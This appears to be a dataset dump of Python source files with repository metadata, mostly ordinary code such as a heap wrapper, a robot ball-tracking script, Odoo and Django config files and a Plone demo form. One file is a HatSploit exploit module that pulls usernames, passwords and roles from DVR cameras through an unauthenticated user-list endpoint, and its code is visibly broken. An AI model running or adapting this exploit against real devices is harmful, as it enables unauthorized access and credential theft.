blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
83a7cf76438adbf0701b18c3ad90a86a5c6c7c4f | 880a56c0eebcce3376d1969bb8b084d82b90f535 | /xos/tosca/resources/vcpeservice.py | 2a6a56db92968457ed9e7b053b4e159a17d86f92 | [
"Apache-2.0"
] | permissive | digideskio/xos | 9f590a3a2703198c4d5b9b2fa27a3b9a94c14b96 | 9c98f28793ce4b2e4be96665e7f06b9cf9b59315 | refs/heads/master | 2020-12-03T08:13:08.982841 | 2016-04-06T00:39:06 | 2016-04-06T00:39:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | import os
import pdb
import sys
import tempfile
sys.path.append("/opt/tosca")
from translator.toscalib.tosca_template import ToscaTemplate
from services.cord.models import VSGService
from service import XOSService
class XOSVsgService(XOSService):
provides = "tosca.nodes.VSGService"
xos_model = VSGService
copyin_props = ["view_url", "icon_url", "enabled", "published", "public_key",
"private_key_fn", "versionNumber", "backend_network_label",
"wan_container_gateway_ip", "wan_container_gateway_mac",
"wan_container_netbits", "dns_servers", "node_label"]
| [
"[email protected]"
] | |
d2d18338371df02f19a8aa511ed62c3486298a71 | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/437116_Wrapper_class_heapq/recipe-437116.py | 0d8f07bdf229fd1e0efdc4a367c438cd088d4c8f | [
"MIT",
"Python-2.0"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,197 | py | import heapq
class Heap(list):
"""This is a wrapper class for the heap functions provided
by the heapq module.
"""
__slots__ = ()
def __init__(self, t=[]):
self.extend(t)
self.heapify()
push = heapq.heappush
popmin = heapq.heappop
replace = heapq.heapreplace
heapify = heapq.heapify
def pushpop(self, item):
"Push the item onto the heap and then pop the smallest value"
if self and self[0] < item:
return heapq.heapreplace(self, item)
return item
def __iter__(self):
"Return a destructive iterator over the heap's elements"
try:
while True:
yield self.popmin()
except IndexError:
pass
def reduce(self, pos, newitem):
"Replace self[pos] with a lower value item and then reheapify"
while pos > 0:
parentpos = (pos - 1) >> 1
parent = self[parentpos]
if parent <= newitem:
break
self[pos] = parent
pos = parentpos
self[pos] = newitem
def is_heap(self):
"Return True if the heap has the heap property; False otherwise"
n = len(self)
# The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
try:
for i in xrange(n//2):
if self[i] > self[2*i+1]: return False
if self[i] > self[2*i+2]: return False
except IndexError:
pass
return True
def heapsort(seq):
return [x for x in Heap(seq)]
if __name__ == '__main__':
from random import randint, shuffle
# generate a random test case
n = 15
data = [randint(1,n) for i in xrange(n)]
shuffle(data)
print data
# test the constructor
heap = Heap(data)
print heap, heap.is_heap()
# test popmin
sorted = []
while heap:
sorted.append(heap.popmin())
data.sort()
print heap, heap.is_heap()
print data == sorted
# test 2
shuffle(data)
print data
# test push
for item in data:
heap.push(item)
print heap, heap.is_heap()
# test __iter__
sorted = [x for x in heap]
data.sort()
print data == sorted
# test 3
shuffle(data)
print data
heap = Heap(data)
print heap, heap.is_heap()
# test reduce
for i in range(5):
pos = randint(0,n-1)
decr = randint(1,10)
item = heap[pos] - decr
heap.reduce(pos, item)
# test is_heap
heap = Heap(data)
count = 0
while 1:
shuffle(heap)
if heap.is_heap():
print heap
break
else:
count += 1
print 'It took', count, 'tries to find a heap by chance.'
print heapsort(data)
try:
heap.x = 5
except AttributeError:
print "Can't add attributes."
| [
"[email protected]"
] | |
07429b6879f054b600fb5a4eef6ac5a978e6a3c6 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Tools/RunTimeTester/share/RTTRegression.py | 19c13f5f565c3c5ef12dd5971cc99fc2fc4f666e | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,958 | py | ######################################################
# #
# Do NOT bind any objects (self.xxx) which contain #
# file objects (such as self.logger in this class #
# otherwise cannit shelve the objects #
# Instead, unload the necessary variables in #
# __init__ #
# #
######################################################
import os.path, anydbm
class RTTRegression:
"""An RTT test to run its own TestSuite under RTT control
This test checks that classes can be instantitiated. It also
creates the databass needed to run RTTRegression"""
def __init__(self, argDict):
self.success = 0
self.error = -1
# self.logger = argDict['logger']
self.logger = Logger()
msg = 'Instantiating RTTRegression, args: %s' %str(argDict)
self.logger.debug(msg)
# fixtureDir is set in JobsXMLReader when reading in the config file.
self.fixtureDir = argDict['fixtureDir']
# the current directory
jDescriptor = argDict['JobDescriptor']
self.runPath = jDescriptor.runPath
self.logDir = jDescriptor.runPath
# directory of the source code under test
self.rttSrcDir = os.path.join(self.runPath, 'Tools/RunTimeTester/src')
self.runPath = jDescriptor.runPath
fixture = os.path.basename(self.fixtureDir)
self.dbName = os.path.join(self.runPath, fixture+'.db')
self.refdbName = os.path.join(self.runPath, 'refFile_'+fixture+'.db')
# do not open the dir does not exist yet
self.ofName = os.path.join(self.runPath, fixture+'_regression.log')
def run(self):
outFile = open(self.ofName, 'w')
if not os.path.exists(self.dbName):
msg = 'None existant path: %s' % self.dbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
if not os.path.exists(self.refdbName):
msg = 'None existant path: %s' % self.refdbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
newDB = anydbm.open(self.dbName, 'r')
oldDB = anydbm.open(self.refdbName, 'r')
result = self.success
onlyInNew = [k for k in newDB.keys() if k not in oldDB.keys()]
text = 'Number of keys in reference db %d\n' % len(oldDB.keys())
text = 'Number of keys in new db %d\n' % len(newDB.keys())
if onlyInNew:
result = self.error
text += '\n'
text +='Reference - %s: date: %s\n' % (oldDB['fixtureDir'],
oldDB['date'])
text += 'New - %s: date: %s\n' % (newDB['fixtureDir'],
newDB['date'])
text += '\n'
text += ' keys in new database, but not in old\n'
text += str(onlyInNew)+'\n'
text += '\n'
onlyInOld = [k for k in oldDB.keys() if k not in newDB.keys()]
if onlyInOld:
result = self.error
text += '\n'
text += ' keys in old database, but not in new\n'
text += str(onlyInOld)+'\n'
text += '\n'
keys = [k for k in oldDB.keys() if k in newDB.keys()]
toRemove = ['fixtureDir', 'date']
[keys.remove(k) for k in toRemove if k in keys]
if keys:
text += 'differences:\n'
text += '\n'
for k in keys:
if oldDB[k] != newDB[k]:
result = self.error
text += 'Key: %s\n' % k
text += '\n'
text += ' old:\n'
text += ' ' +str(oldDB[k])+'\n'
text += '\n'
text += ' new:\n'
text += ' '+str(newDB[k])+'\n'
text += '\n'
totTests = 0
text += 'Number of points examined:\n'
for k in keys:
line = ''
line += k.ljust(30)
ntestOld = len(oldDB[k].split(','))
ntestNew = len(newDB[k].split(','))
# assert(ntestOld == ntestNew)
num = '%d' % ntestOld
line += num.ljust(5)
# print line
totTests += ntestOld
text += 'No of test classes which pass: %d\n' % len(keys)
text += 'Total number of tests passed: %d\n ' %totTests
outFile.write(text)
outFile.close()
return result
| [
"[email protected]"
] | |
170b5974377c2010e0e6ae80d052cc8a08dec18a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/4dab219f99ff457d92c76f4fa70ad98f.py | 52042ea3de170bc5f8eedc4c2b7c186736a74912 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 308 | py | #
# Skeleton file for the Python "Bob" exercise.
#
def hey(what):
if what.upper() == what and what.lower() != what:
return 'Whoa, chill out!'
elif what.endswith('?'):
return 'Sure.'
elif what.strip() == '':
return 'Fine. Be that way!'
else:
return 'Whatever.'
| [
"[email protected]"
] | |
45db6168ca6a0ad2f3120d8dba3898a85cf52fd8 | 8f1dbd7c032a57c74a36f07690b2ecc80fb3e665 | /scratch/follow-ball.piborg.py | 09741060a051a0ba26472b3e1a30bbafa4e92cae | [
"MIT"
] | permissive | westpark/piwars-2018 | 6b861ff46366a76cbf8bfbec11d255e31d471b3a | a2e1cb67e5fcc8f65ed17975d076088a9f92da2a | refs/heads/master | 2021-04-28T10:57:42.294132 | 2018-04-19T10:35:24 | 2018-04-19T10:35:24 | 122,079,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,143 | py | #!/usr/bin/env python
# coding: utf-8
# Load library functions we want
import time
import os
import sys
import ThunderBorg
import io
import threading
import picamera
import picamera.array
import cv2
import numpy
print 'Libraries loaded'
# Global values
global running
global TB
global camera
global processor
running = True
# Setup the ThunderBorg
TB = ThunderBorg.ThunderBorg()
#TB.i2cAddress = 0x15 # Uncomment and change the value if you have changed the board address
TB.Init()
if not TB.foundChip:
boards = ThunderBorg.ScanForThunderBorg()
if len(boards) == 0:
print 'No ThunderBorg found, check you are attached :)'
else:
print 'No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress)
for board in boards:
print ' %02X (%d)' % (board, board)
print 'If you need to change the I²C address change the setup line so it is correct, e.g.'
print 'TB.i2cAddress = 0x%02X' % (boards[0])
sys.exit()
TB.SetCommsFailsafe(False)
# Power settings
voltageIn = 12.0 # Total battery voltage to the ThunderBorg
voltageOut = 12.0 * 0.95 # Maximum motor voltage, we limit it to 95% to allow the RPi to get uninterrupted power
# Camera settings
imageWidth = 320 # Camera image width
imageHeight = 240 # Camera image height
frameRate = 3 # Camera image capture frame rate
# Auto drive settings
autoMaxPower = 1.0 # Maximum output in automatic mode
autoMinPower = 0.2 # Minimum output in automatic mode
autoMinArea = 10 # Smallest target to move towards
autoMaxArea = 10000 # Largest target to move towards
autoFullSpeedArea = 300 # Target size at which we use the maximum allowed output
# Setup the power limits
if voltageOut > voltageIn:
maxPower = 1.0
else:
maxPower = voltageOut / float(voltageIn)
autoMaxPower *= maxPower
# Image stream processing thread
class StreamProcessor(threading.Thread):
def __init__(self):
super(StreamProcessor, self).__init__()
self.stream = picamera.array.PiRGBArray(camera)
self.event = threading.Event()
self.terminated = False
self.start()
self.begin = 0
def run(self):
# This method runs in a separate thread
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
# Read the image and do some processing on it
self.stream.seek(0)
self.ProcessImage(self.stream.array)
finally:
# Reset the stream and event
self.stream.seek(0)
self.stream.truncate()
self.event.clear()
# Image processing function
def ProcessImage(self, image):
# Get the red section of the image
image = cv2.medianBlur(image, 5)
image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) # Swaps the red and blue channels!
red = cv2.inRange(image, numpy.array((115, 127, 64)), numpy.array((125, 255, 255)))
# Find the contours
contours,hierarchy = cv2.findContours(red, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# Go through each contour
foundArea = -1
foundX = -1
foundY = -1
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
cx = x + (w / 2)
cy = y + (h / 2)
area = w * h
if foundArea < area:
foundArea = area
foundX = cx
foundY = cy
if foundArea > 0:
ball = [foundX, foundY, foundArea]
else:
ball = None
# Set drives or report ball status
self.SetSpeedFromBall(ball)
# Set the motor speed from the ball position
def SetSpeedFromBall(self, ball):
global TB
driveLeft = 0.0
driveRight = 0.0
if ball:
x = ball[0]
area = ball[2]
if area < autoMinArea:
print 'Too small / far'
elif area > autoMaxArea:
print 'Close enough'
else:
if area < autoFullSpeedArea:
speed = 1.0
else:
speed = 1.0 / (area / autoFullSpeedArea)
speed *= autoMaxPower - autoMinPower
speed += autoMinPower
direction = (x - imageCentreX) / imageCentreX
if direction < 0.0:
# Turn right
driveLeft = speed
driveRight = speed * (1.0 + direction)
else:
# Turn left
driveLeft = speed * (1.0 - direction)
driveRight = speed
print '%.2f, %.2f' % (driveLeft, driveRight)
else:
print 'No ball'
TB.SetMotor1(driveLeft)
TB.SetMotor2(driveRight)
# Image capture thread
class ImageCapture(threading.Thread):
def __init__(self):
super(ImageCapture, self).__init__()
self.start()
def run(self):
global camera
global processor
print 'Start the stream using the video port'
camera.capture_sequence(self.TriggerStream(), format='bgr', use_video_port=True)
print 'Terminating camera processing...'
processor.terminated = True
processor.join()
print 'Processing terminated.'
# Stream delegation loop
def TriggerStream(self):
global running
while running:
if processor.event.is_set():
time.sleep(0.01)
else:
yield processor.stream
processor.event.set()
# Startup sequence
print 'Setup camera'
camera = picamera.PiCamera()
camera.resolution = (imageWidth, imageHeight)
camera.framerate = frameRate
imageCentreX = imageWidth / 2.0
imageCentreY = imageHeight / 2.0
print 'Setup the stream processing thread'
processor = StreamProcessor()
print 'Wait ...'
time.sleep(2)
captureThread = ImageCapture()
try:
print 'Press CTRL+C to quit'
TB.MotorsOff()
TB.SetLedShowBattery(True)
# Loop indefinitely until we are no longer running
while running:
# Wait for the interval period
# You could have the code do other work in here :)
time.sleep(1.0)
# Disable all drives
TB.MotorsOff()
except KeyboardInterrupt:
# CTRL+C exit, disable all drives
print '\nUser shutdown'
TB.MotorsOff()
except:
# Unexpected error, shut down!
e = sys.exc_info()[0]
print
print e
print '\nUnexpected error, shutting down!'
TB.MotorsOff()
# Tell each thread to stop, and wait for them to end
running = False
captureThread.join()
processor.terminated = True
processor.join()
del camera
TB.MotorsOff()
TB.SetLedShowBattery(False)
TB.SetLeds(0,0,0)
print 'Program terminated.' | [
"[email protected]"
] | |
c6c9f8053ce7426d8e40844b29b1a9736d500e03 | 777a972966fa29a1b5a1a0c5d507a3137de007fc | /stock_pick_batch/__manifest__.py | cfbf3abdc520bc1242de59ad4d6ad1cd7d0cc3c3 | [] | no_license | suningwz/ruvati | 1d1ace30fb2929f686f368fb8d8c51ae76a71190 | 9b15373125139cab1d26294c218685c5b87b9709 | refs/heads/master | 2023-08-15T22:28:18.499733 | 2021-10-12T12:16:56 | 2021-10-12T12:16:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | # -*- coding: utf-8 -*-
{
"name": "Stock Picking Batch",
"version": "1.1",
"category": 'Inventory',
'complexity': "normal",
'author': 'Confianz Global,Inc.',
'description': """
Batch transfer in inventory
""",
'website': 'http://www.confianzit.com',
"depends": ['base', 'delivery_extension', 'stock_picking_batch','stock','delivery'],
'data': [
'views/stock_view.xml',
'report/batch_picking_report.xml',
'report/batch_picking_report_views.xml',
'static/src/xml/batch_transfer_ruvati.xml'
],
'demo_xml': [],
'installable': True,
'application': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
f58261daab0df0e28c03fbe345a6d2e337fdc477 | 45b159e64114d8759c0e2987bd0a6f02f60daf4d | /Python/APL/ch14/distanceThreeArrays.py | 80483127107e3734d02efe667945abcd5ac19af1 | [] | no_license | afcarl/Coding_Interview_Problems | 45b24b849a90581db5327811c5ab78237f4d5ac0 | 1256d4394d506aec875e9e19300404a9b32a4eb1 | refs/heads/master | 2020-03-16T20:16:54.706152 | 2015-02-11T05:51:56 | 2015-02-11T05:51:56 | 132,953,286 | 1 | 0 | null | 2018-05-10T20:54:14 | 2018-05-10T20:54:14 | null | UTF-8 | Python | false | false | 274 | py | '''
Created on Jan 24, 2015
@author: Ben Athiwaratkun (pa338)
'''
#from __future__ import division
#import numpy as np
def findMin(A,B,C):
pass
def main():
A = [1,2,3]
B = [4,1,8]
C = [3,2,7]
findMin(A,B,C)
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
11689979f2e6aaa273058e3b89ba57a7a4d578c0 | 1fa265a01400c23f9ca494a1d9ef55b6cef85cdc | /inventory/migrations/0102_auto_20200131_1454.py | ac78634fc95dc9da549ec9a25ce03a0aaf6d0ca9 | [] | no_license | dipesh779/posbackend | 523660b40be4d5deaff6b6c267c65fa9caba00de | 06effb004448dbb6d99077790ceb4738875e6505 | refs/heads/master | 2022-04-25T09:15:12.081266 | 2020-05-04T04:45:56 | 2020-05-04T04:45:56 | 261,082,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | # Generated by Django 2.2.7 on 2020-01-31 09:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0101_auto_20200131_0911'),
]
operations = [
migrations.AlterField(
model_name='stockcomputation',
name='complimentory_sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='discrepancy_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='expired_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='final_closing_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='inspected_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='received_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='theoritical_QOH',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='threshold_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='weigh_price',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
]
| [
"[email protected]"
] | |
836dc051ae842d3fb098afe67dd219518fdf722b | 2aa47f47fb81798afdf41437844cbbea8e9de66c | /02pythonBase/day12/day11_exercise/factorial_sum.py | d9c669a1112be4d4c20c74aede6742f36eab15e2 | [] | no_license | nykh2010/python_note | 83f2eb8979f2fb25b4845faa313dbd6b90b36f40 | 5e7877c9f7bf29969072f05b98277ef3ba090969 | refs/heads/master | 2020-04-27T23:10:16.578094 | 2019-03-23T02:43:14 | 2019-03-23T02:43:14 | 174,765,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | # 3. 写程序算出 1 ~ 20 的阶乘的和
# 1! + 2! + 3! + 4! + ..... + 20!
# 方法1
# def myfac(n):
# if n == 1:
# return 1
# return n * myfac(n - 1)
# s = 0
# for x in range(1, 21):
# s += myfac(x)
# print(s)
import math
print(sum(map(math.factorial, range(1, 21))))
| [
"[email protected]"
] | |
ef7cfcbb15eaf35f6cd7f8058281eb80959721bb | 40fc1d38f2d4b643bc99df347c4ff3a763ba65e3 | /arcade/infiniworld/src/infiniworld/__init__.py | 77165064cf85d6cbd506c2db160a29d5cf41a5cf | [] | no_license | alecordev/pygaming | 0be4b7a1c9e7922c63ce4cc369cd893bfef7b03c | 35e479b703acf038f47c2151b3759ad852781e4c | refs/heads/master | 2023-05-14T05:03:28.484678 | 2021-06-03T10:11:08 | 2021-06-03T10:11:08 | 372,768,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | """The infiniworld package contains the entire game engine: Models Views and
Controllers, but also physics, geometry, time management, etc.
"""
from . import controllers
from . import events
from . import evtman
from . import geometry
from . import log
from . import models
from . import physics
from . import time_
| [
"[email protected]"
] | |
b81680590f118a2d347e1fb05c0986f14e401d1d | 5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8 | /buildout-cache/eggs/plone.formwidget.contenttree-1.0.14-py2.7.egg/plone/formwidget/contenttree/demo.py | 57b8a81802b37b1a271061de3b3b447da24627fd | [] | no_license | renansfs/Plone_SP | 27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a | 8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5 | refs/heads/master | 2021-01-15T15:32:43.138965 | 2016-08-24T15:30:19 | 2016-08-24T15:30:19 | 65,313,812 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py | from zope.component import adapts
from zope.interface import Interface, implements
from zope import schema
from plone.z3cform import layout
from z3c.form import form, button, field
from plone.formwidget.contenttree import ContentTreeFieldWidget
from plone.formwidget.contenttree import MultiContentTreeFieldWidget
from plone.formwidget.contenttree import PathSourceBinder
class ITestForm(Interface):
buddy = schema.Choice(title=u"Buddy object",
description=u"Select one, please",
source=PathSourceBinder(portal_type='Document'))
friends = schema.List(
title=u"Friend objects",
description=u"Select as many as you want",
value_type=schema.Choice(
title=u"Selection",
source=PathSourceBinder(portal_type='Document')))
class TestAdapter(object):
implements(ITestForm)
adapts(Interface)
def __init__(self, context):
self.context = context
def _get_buddy(self):
return None
def _set_buddy(self, value):
print "setting", value
buddy = property(_get_buddy, _set_buddy)
def _get_friends(self):
return []
def _set_friends(self, value):
print "setting", value
friends = property(_get_friends, _set_friends)
class TestForm(form.Form):
fields = field.Fields(ITestForm)
fields['buddy'].widgetFactory = ContentTreeFieldWidget
fields['friends'].widgetFactory = MultiContentTreeFieldWidget
# To check display mode still works, uncomment this and hit refresh.
#mode = 'display'
@button.buttonAndHandler(u'Ok')
def handle_ok(self, action):
data, errors = self.extractData()
print data, errors
TestView = layout.wrap_form(TestForm)
| [
"[email protected]"
] | |
2d3850df0c094eeb7f706d70aa509e5e2011f721 | 772b0df2635b95644ea3eb370103174804024167 | /scripts/process_file.py | cfce2bb5b07aee825c3a76f0632392eb3a6e3579 | [
"MIT"
] | permissive | 4dn-dcic/clodius | ec909bda90a9df13fa1b85472951f6cf149213a5 | aa31b3d90a5a9fec883c20cab31ad4d347cd52cd | refs/heads/develop | 2020-04-17T23:31:32.114043 | 2019-04-02T14:01:46 | 2019-04-02T14:01:46 | 167,038,915 | 0 | 0 | MIT | 2019-03-28T20:10:46 | 2019-01-22T17:43:32 | Python | UTF-8 | Python | false | false | 2,597 | py | from __future__ import print_function
import argparse
import os.path as op
import subprocess as sp
import sys
import tempfile as tf
def main():
usage = """
python make_tiles.py input_file
Create tiles for all of the entries in the JSON file.
"""
parser = argparse.ArgumentParser()
parser.add_argument('filepath')
parser.add_argument('-a', '--assembly', default='hg19')
parser.add_argument('-t', '--type', default='bedgraph')
parser.add_argument('--stdout', default=False, action='store_true',
help="Dump output to stdout (not implemented yet)")
args = parser.parse_args()
filedir = op.dirname(args.filepath)
outfile = open(args.filepath + '.genome.sorted.gz', 'w')
tempfile = tf.TemporaryFile('w+b')
if args.type == 'bigwig':
tempfile1 = tf.TemporaryFile()
p05 = sp.Popen(['bigWigToBedGraph', args.filepath, '/dev/fd/1'],
stdout = tempfile1)
p05.wait()
tempfile1.seek(0)
p0 = sp.Popen(['pv', '-f', '-'],
stdin=tempfile1,
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
elif args.type == 'bedgraph':
p0 = sp.Popen(['pv', '-f', args.filepath],
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
p1 = sp.Popen(["awk", "{print $1, $2, $1, $3, $4 }"],
stdin = pn.stdout,
stdout=sp.PIPE)
p2 = sp.Popen(['chr_pos_to_genome_pos.py', '-e 5', '-a', '{}'.format(args.assembly)],
stdin = p1.stdout,
stdout=sp.PIPE)
p3 = sp.Popen(['sort', '-k1,1n', '-k2,2n', '-'],
stdin = p2.stdout,
stdout=tempfile)
for line in iter(p0.stderr.readline, ""):
print("line:", line.strip())
p0.wait()
p1.wait()
p2.wait()
p3.wait()
tempfile.flush()
print("tell:", tempfile.tell())
tempfile.seek(0)
p35 = sp.Popen(['pv', '-f', '-'],
stdin = tempfile,
stdout = sp.PIPE,
stderr = sp.PIPE,
universal_newlines=True)
p4 = sp.Popen(['gzip'],
stdin = p35.stdout, stdout=outfile)
for line in iter(p35.stderr.readline, ""):
print("line:", line.strip())
p35.wait()
p4.wait()
print("filedir:", filedir)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
512c1fce60003522e98e0f5f3d8278c65001a88e | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/dvr/camera_credentials_disclosure.py | 563adb10d9ee37945d96f06681ce86ece688b976 | [
"MIT"
] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,120 | py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
from core.lib.module import Module
from utils.http.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "DVR Camera Credentials Disclosure",
'Module': "exploit/unix/dvr/camera_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'ezelf'
],
'Description': "DVR Camera credentials disclosure.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
self.output_process("Generating payload...")
cookies = {
"uid": "admin"
}
payload = '/device.rsp?opt=user&cmd=list'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
cookies=cookies
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
try:
json_data = json.loads(response.text)
for data in json_data["list"]:
credentials.append((data["uid"], data["pwd"], data["role"]))
self.print_table("Credentials", ('Username', 'Password', 'Role'), *credentials)
except Exception:
self.output_error("Credentials could not be found!")
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port)
| [
"[email protected]"
] | |
84cb538f8850e3ffa7072e85d2b0228a7d713a47 | 356f3f1b7caf0ccb20cc830d40821dfb2cbda046 | /sfit/workout/doctype/workout_day/test_workout_day.py | 8696ffbb32d632dbc281ece67008a9e16deb779d | [
"MIT"
] | permissive | vignesharumainayagam/sfit | f4b75b9a8b2de08d0eaa4eadbcd3d5e432ffba56 | a96afbf35b0e1635e44cb5f83d7f86c83abedb8f | refs/heads/master | 2021-09-05T18:22:43.494208 | 2018-01-30T07:23:02 | 2018-01-30T07:23:02 | 104,332,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestWorkoutDay(unittest.TestCase):
pass
| [
